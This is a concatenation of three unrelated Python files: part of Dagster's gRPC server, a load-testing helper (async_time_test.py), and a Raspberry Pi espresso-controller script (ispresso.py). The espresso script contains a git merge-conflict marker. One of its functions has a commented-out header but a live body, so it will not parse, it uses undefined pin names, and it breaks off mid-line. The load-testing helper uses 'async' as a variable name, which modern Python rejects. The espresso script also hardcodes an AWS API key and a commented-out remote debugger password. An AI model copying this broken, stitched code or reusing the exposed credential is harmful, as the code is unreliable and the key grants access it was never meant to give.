serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except grpc._channel._InactiveRpcError: # pylint: disable=protected-access
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
if server_process.poll() != None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
async_time_test.py
|
# -*- coding: utf-8 -*-
'''
module: async_time_test
author: denis@ryzhkov.org
license: free
See «async_time_test.async_time_test» docstring.
'''
__all__ = [
'async_time_test',
]
__version__ = '0.4'
#### async_time_test
def async_time_test(actions_args=[], actions_per_second=1, action_time_limit_in_seconds=1, test_time_in_seconds=60, async=True):
'''
«async_time_test» is a tool for highload testing of asynchronous actions,
that must be completed successfully in some time limit.
Usage:
def action1():
do_some_payload1()
def action2():
do_some_payload2()
for async in False, True: # to compare stats
stats = async_time_test(
actions_args=[
dict(action=action1, actions_per_second=10),
dict(action=action2, actions_per_second=20),
],
action_time_limit_in_seconds=1,
test_time_in_seconds=60,
async=async,
)
# «action*» args can be passed per-action or per-test
from json import dumps
print(dumps(stats, indent=4))
# actions_count: {
# total: 1800,
# successful: 1000,
# failed: {
# total: 800,
# crashed: 10,
# timedout: 790,
# }},
# action_time_in_seconds: {
# min: 0.01,
# avg: 2,
# max: 30,
# },
# test_time_in_seconds: {
# expected: 60,
# real: 69,
# },
# async: False/True,
'''
#### import
from time import sleep
from time import time as clock # WARNING: seems like «clock» is spoiled by multi-threading on Debian
from threading import current_thread, Lock, Thread
#### actions_args init
for action_args in actions_args:
for arg in 'actions_per_second', 'action_time_limit_in_seconds':
action_args[arg] = action_args.get(arg, locals().get(arg, None)) # DRY combination of per-action args with per-test args and defaults
action_args['total_actions_count'] = int(test_time_in_seconds * action_args['actions_per_second'])
#### stats init
lock = Lock() # locks update of next values:
stats = dict(
actions_count=dict(
total=sum(action_args['total_actions_count'] for action_args in actions_args),
successful=0,
failed=dict(
total=0,
crashed=0,
timedout=0,
),
),
action_time_in_seconds=dict(
min=None,
avg=None,
max=None,
),
action_time_in_seconds_temporary_list=[],
test_time_in_seconds=dict(
expected=test_time_in_seconds,
real=None,
),
async=async,
)
#### single_runner
def single_runner(stats, action, action_time_limit_in_seconds):
is_crashed = False
start = clock()
try:
action()
except:
is_crashed = True
from traceback import print_exc
print_exc()
stop = clock()
action_time_in_seconds = stop - start
with lock:
stats['action_time_in_seconds_temporary_list'].append(action_time_in_seconds)
failed_stats = stats['actions_count']['failed']
if is_crashed:
failed_stats['crashed'] += 1
failed_stats['total'] += 1
elif action_time_in_seconds > action_time_limit_in_seconds:
failed_stats['timedout'] += 1
failed_stats['total'] += 1
else:
stats['actions_count']['successful'] += 1
#### group_runner
def group_runner(stats, action, total_actions_count, actions_per_second, action_time_limit_in_seconds):
single_threads = []
for single_index in range(total_actions_count):
sleep(1.0 / actions_per_second)
single_thread = Thread(target=single_runner, args=(stats, action, action_time_limit_in_seconds))
single_thread.start()
if async:
single_threads.append(single_thread)
else:
single_thread.join()
if async:
for single_thread in single_threads:
single_thread.join()
group_threads = [
Thread(target=group_runner, args=(stats, ), kwargs=action_args)
for action_args in actions_args
]
#### main thread
start = clock()
for group_thread in group_threads:
group_thread.start()
if not async:
group_thread.join()
if async:
for group_thread in group_threads:
group_thread.join()
stop = clock()
stats['test_time_in_seconds']['real'] = stop - start
#### process action-time-stats
time_list = stats['action_time_in_seconds_temporary_list']
if time_list:
time_stats = stats['action_time_in_seconds']
time_stats['min'] = min(time_list)
time_stats['avg'] = sum(time_list) / len(time_list)
time_stats['max'] = max(time_list)
del stats['action_time_in_seconds_temporary_list']
#### return
return stats
#### minimal tests
def run_tests():
#### prepare
from json import dumps
from random import randrange
from time import sleep
def payload(deviation=0):
one_second_factor = 10
sleep(float(randrange(
one_second_factor - deviation,
one_second_factor + deviation,
)) / one_second_factor)
if not randrange(10):
1/0
def action1():
payload(deviation=1)
def action2():
payload(deviation=2)
actions1_per_second = 10
actions2_per_second = 20
action_time_limit_in_seconds = 1
test_time_in_seconds = 1
#### run
for async in False, True: # to compare stats
stats = async_time_test(
actions_args=[
dict(action=action1, actions_per_second=actions1_per_second),
dict(action=action2, actions_per_second=actions2_per_second),
],
action_time_limit_in_seconds=action_time_limit_in_seconds,
test_time_in_seconds=test_time_in_seconds,
async=async,
)
print(dumps(stats, indent=4))
#### assert
count_stats = stats['actions_count']
assert count_stats['total'] == (actions1_per_second + actions2_per_second) * test_time_in_seconds
assert count_stats['total'] == count_stats['successful'] + count_stats['failed']['total']
assert count_stats['failed']['total'] == count_stats['failed']['crashed'] + count_stats['failed']['timedout']
time_stats = stats['action_time_in_seconds']
assert time_stats['min'] <= time_stats['avg'] <= time_stats['max']
if time_stats['max'] > action_time_limit_in_seconds:
assert count_stats['failed']['timedout'] > 0
print('tests passed')
if __name__ == '__main__':
run_tests()
####
|
ispresso.py
|
<<<<<<< HEAD
#!/usr/bin/python
# Copyright (c) 2013 Chris Synan & Dataworlds LLC
# Portions copyright (c) 2012 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The software is free for non-commercial uses. Commercial uses of this software
# or any derivative must obtain a license from Dataworlds LLC (Austin TX)
# In addition, the above copyright notice and this permission notice shall
# be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, time, shutil, logging, logging.handlers, traceback
import threading, subprocess, requests
import urllib3.contrib.pyopenssl
import multiprocessing
from multiprocessing import Process, Pipe, Queue, Value, current_process
from subprocess import Popen, PIPE, call, signal
from datetime import datetime
from shutil import copy2
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
import web, random, json, atexit
from pid import pidpy as PIDController
import RPi.GPIO as GPIO
#from lcd import lcddriver
import glob
# logging.basicConfig()
logger = logging.getLogger('ispresso')
# REMOTE DEBUG -- TODO: Remove this before going to production
# import rpdb2
# rpdb2.start_embedded_debugger('funkymonkey', fAllowRemote = True)
gpio_heat = 12
gpio_btn_heat_led = 5
gpio_btn_heat_sig = 6
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_btn_heat_sig, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(gpio_heat, GPIO.OUT)
GPIO.setup(gpio_btn_heat_led, GPIO.OUT)
def logger_init():
logger.setLevel(logging.DEBUG)
log_file_size = 1024 * 1024 * 1 # 1 MB
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(process)d - %(name)s : %(message)s')
fh = logging.handlers.RotatingFileHandler('/var/log/ispresso.log', maxBytes=log_file_size, backupCount=5)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('******************************************')
logger.info('Starting up...')
def initialize():
settings.load()
if setup.wifi_connect() == False: # this needs to happen after lcd pipe is set up
logger.warn("WiFi can't connect to internet. Entering Smart Connect mode. Connect to iSPRESSO wireless network.")
#mem.lcd_connection.send(["iSPRESSO WiFi", "Access Point", 0])
setup.smart_connect()
else:
logger.info("WiFi connection looks ok")
#mem.lcd_connection.send(["iSPRESSO", "WiFi OK", 3])
#mem.lcd_connection.send(["iSPRESSO", "", 0])
class mem: # global class
cache_day = None
cache_start_time = None
cache_end_time = None
heat_connection = Pipe()
#lcd_connection = Pipe()
brew_connection = Pipe()
cloud_connection = Pipe()
flag_pump_on = False
sched_flag_on = False
sched_flag_off = False
time_heat_button_pressed = time.time()
scheduler_enabled = True
presoak_time = 3
wait_time = 2
brew_time = 25
one_wire = None
class globalvars(object):
def __init__(self, initval = 0):
self.temperature = multiprocessing.Value("i", initval)
def set_temp(self, n=0):
with self.temperature.get_lock():
self.temperature.value = n
@property
def temp(self):
with self.temperature.get_lock():
return self.temperature.value
class param:
mode = "off"
cycle_time = 2.0
duty_cycle = 0.0
set_point = 655
k_param = 6 # was 6
i_param = 60 # was 120
d_param = 15 # was 5
def add_global_hook(parent_conn, statusQ):
# mem.heat_connection = parent_conn
g = web.storage({"parent_conn" : parent_conn, "statusQ" : statusQ})
def _wrapper(handler):
web.ctx.globals = g
return handler()
return _wrapper
class advanced:
def __init__(self):
self.mode = param.mode
self.cycle_time = param.cycle_time
self.duty_cycle = param.duty_cycle
self.set_point = param.set_point
self.k_param = param.k_param
self.i_param = param.i_param
self.d_param = param.d_param
def GET(self):
return render.advanced(self.mode, self.set_point, self.duty_cycle, self.cycle_time, self.k_param, self.i_param, self.d_param)
def POST(self):
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "mode":
self.mode = datalistkey[1]
if datalistkey[0] == "setpoint":
self.set_point = float(datalistkey[1])
if datalistkey[0] == "dutycycle":
self.duty_cycle = float(datalistkey[1])
if datalistkey[0] == "cycletime":
self.cycle_time = float(datalistkey[1])
if datalistkey[0] == "k":
self.k_param = float(datalistkey[1])
if datalistkey[0] == "i":
self.i_param = float(datalistkey[1])
if datalistkey[0] == "d":
self.d_param = float(datalistkey[1])
param.mode = self.mode
param.cycle_time = self.cycle_time
param.duty_cycle = self.duty_cycle
param.set_point = self.set_point
param.k_param = self.k_param
param.i_param = self.i_param
param.d_param = self.d_param
settings.save()
web.ctx.globals.parent_conn.send([self.mode, self.cycle_time, self.duty_cycle, self.set_point, self.k_param, self.i_param, self.d_param, False])
def gettempProc(global_vars, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("getTempProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
t = time.time()
time.sleep(0.5) # .1+~.83 = ~1.33 seconds
num = tempdata()
elapsed = "%.2f" % (time.time() - t)
conn.send([num, elapsed])
fah = (9.0 / 5.0) * num + 32
global_vars.set_temp(int(fah)) # convert to int before storing the global var
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def getonofftime(cycle_time, duty_cycle):
duty = duty_cycle / 100.0
on_time = cycle_time * (duty)
off_time = cycle_time * (1.0 - duty)
return [on_time, off_time]
def tellHeatProc(heat_mode=None, flush_cache=None):
if flush_cache is None:
flush_cache = False
if heat_mode is not None:
param.mode = heat_mode
mem.heat_connection.send([param.mode, param.cycle_time, param.duty_cycle, param.set_point, param.k_param, param.i_param, param.d_param, flush_cache])
def heatProc(cycle_time, duty_cycle, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("heatProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
while (conn.poll()): # get last
cycle_time, duty_cycle = conn.recv()
conn.send([cycle_time, duty_cycle])
if duty_cycle == 0:
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(cycle_time)
elif duty_cycle == 100:
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(cycle_time)
else:
on_time, off_time = getonofftime(cycle_time, duty_cycle)
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(on_time)
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(off_time)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
#def lcdControlProc(lcd_child_conn):
p = current_process()
logger = logging.getLogger("ispresso").getChild("lcdControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
#lcd = lcddriver.lcd()
last_line1 = ""
last_line2 = ""
# while (True):
time.sleep(0.25)
#while lcd_child_conn.poll():
# try:
#line1, line2, duration = lcd_child_conn.recv()
if line1 is not None:
if last_line1 != line1:
#lcd.lcd_display_string(line1.ljust(16), 1)
last_line1 = line1
time.sleep(duration)
if line2 is not None:
if last_line2 != line2:
#lcd.lcd_display_string(line2.ljust(16), 2)
last_line2 = line2
time.sleep(duration)
#except:
#exc_type, exc_value, exc_traceback = sys.exc_info()
#logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
#subprocess.call(['i2cdetect', '-y', '1'])
try:
#lcd = None
time.sleep(0.1)
#lcd = lcddriver.lcd()
# time.sleep(0.1)
except:
# logger.error("Trying to re-initialize the #LCD by nulling it out and re-instantiating. Couldln't pull it #off :(")
#continue
def brewControlProc(brew_child_conn):
p = current_process()
logger = logging.getLogger("ispresso").getChild("brewControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
mem.flag_pump_on = False
button_bounce_threshold_secs = 1
while(True):
time_button_pushed, brew_plan = brew_child_conn.recv() # BLOCKS until something shows up
mem.flag_pump_on = True
for listitem in brew_plan:
if mem.flag_pump_on == False:
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
break
action = listitem[0]
duration = listitem[1]
counter = 0
start_time = time.time()
if action.upper() in ("PRESOAK", "BREW"):
GPIO.output(gpio_btn_pump_led, GPIO.HIGH)
GPIO.output(gpio_pump, GPIO.HIGH)
while ((counter < duration) & mem.flag_pump_on) : # might not need the check for flag_pump_on here, as its above
time.sleep(0.1)
if brew_child_conn.poll(): # mem.brew_connection.poll() returns TRUE or FALSE immediately and does NOT block
time_button_pushed_again, throwaway_brew_plan = brew_child_conn.recv() # get item off the list, check how long since time_button_pushed, against button_bounce_threshold_secs. If too short, clean up and exit this loop
if time_button_pushed_again - time_button_pushed > button_bounce_threshold_secs:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.flag_pump_on = False
mem.lcd_connection.send([None, "", 0])
break
if (time.time() - start_time) >= counter:
counter = counter + 1
message = action + 'ing ' + str(duration - counter) + 's'
mem.lcd_connection.send([None, message, 0])
logger.debug(message)
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.lcd_connection.send([None, '', 0])
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
finally:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
def cloudControlProc(global_vars, brew_conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("cloudControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
last_cmd_time = time.time()
secs_cmd_interval = 1.25
echoUserId = ""
# TODO: fetch userId from file on startup - also means we have to bounce the service when set from /echo POST
try:
with open("echo.json") as readFile:
my_settings = json.load(readFile)
echoUserId = my_settings["userId"]
except (IOError, ValueError):
logger.debug("Killing cloud process as we don't have a valid echoUserId")
return False # EXIT if we don't have a valid echoUserId - no sense racking up an AWS bill if we don't need to!
if not setup.check_connected():
logger.debug("Killing cloud process as we are not connected to internet")
return False # not going to keep this process running if we are not connected to internet.
if echoUserId == "":
logger.debug("Killing cloud process as we still don't have a valid echoUserId")
return False
logger.debug("Starting main loop with echoUserId = " + echoUserId)
while True:
time.sleep(0.1)
now_time = time.time()
if now_time - last_cmd_time > secs_cmd_interval:
last_cmd_time = now_time
try:
temp = global_vars.temp
url = 'https://ltqynxd6pc.execute-api.us-east-1.amazonaws.com/prod/ispresso-cloud-status-command' # post status to AWS, check for a command. Delete command from AWS. Execute command here
payload = {'echoUserId': echoUserId, 'temp': temp, 'temp_unit' : ' Fahrenheit'}
payload = json.dumps(payload)
headers = {'x-api-key': 'FqwN8fidPq7vvPTPcsOHd2V0BtAd17768Kq8UPM5'}
resp = requests.post(url, data=payload, headers=headers)
data = json.loads(resp.text)
if len(data.keys()) > 0: #[0] == "Item":
logger.debug("Received payload from AWS: " + str(data))
command = data["Item"]["command"]
currenttime = data["Item"]["currenttime"]
commandtime = data["Item"]["datetime"]
logger.debug("command = " + command)
if command == "brew":
# check to see if not too much time has passed from command to current time
min_diff = round((currenttime - commandtime) / 60000) ;
if min_diff > 1:
logger.error("Command is " + str(min_diff) + " minutes old! ")
else:
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
brew_conn.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def tempControlProc(global_vars, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param, statusQ, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("tempControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
parent_conn_temp, child_conn_temp = Pipe()
ptemp = Process(name="gettempProc", target=gettempProc, args=(global_vars, child_conn_temp,))
ptemp.daemon = True
ptemp.start()
parent_conn_heat, child_conn_heat = Pipe()
pheat = Process(name="heatProc", target=heatProc, args=(cycle_time, duty_cycle, child_conn_heat))
pheat.daemon = True
pheat.start()
pid = PIDController.pidpy(cycle_time, k_param, i_param, d_param) # init pid
flush_cache = False
last_temp_C = 0
while (True):
time.sleep(0.1)
readytemp = False
while parent_conn_temp.poll():
temp_C, elapsed = parent_conn_temp.recv() # non blocking receive
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off -- MOVING THIS as the OFF doesnt seem to fire..
if temp_C > 0: # the 1-wire sensor sometimes comes back with 0 -- need to fix that by holding on to last value.
last_temp_C = temp_C
else:
temp_C = last_temp_C
temp_F = (9.0 / 5.0) * temp_C + 32
temp_C_str = "%3.2f" % temp_C
temp_F_str = "%3.2f" % temp_F
temp_F_pretty = "%3.0f" % temp_F
mem.lcd_connection.send(['iSPRESSO ' + str(temp_F_pretty) + ' F', None, 0])
readytemp = True
if readytemp == True:
if mode == "auto":
duty_cycle = pid.calcPID_reg4(temp_F, set_point, True)
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.HIGH)
elif mode == "off":
duty_cycle = 0
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
if (not statusQ.full()):
statusQ.put([temp_F_str, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param]) # GET request
readytemp == False
while parent_conn_heat.poll(): # non blocking receive
cycle_time, duty_cycle = parent_conn_heat.recv()
while conn.poll(): # POST settings
mode, cycle_time, duty_cycle_temp, set_point, k_param, i_param, d_param, flush_cache = conn.recv()
if flush_cache:
mem.cache_day = None # this should force cache flush
flush_cache = False
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class getstatus:
def __init__(self):
pass
def GET(self): # blocking receive
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
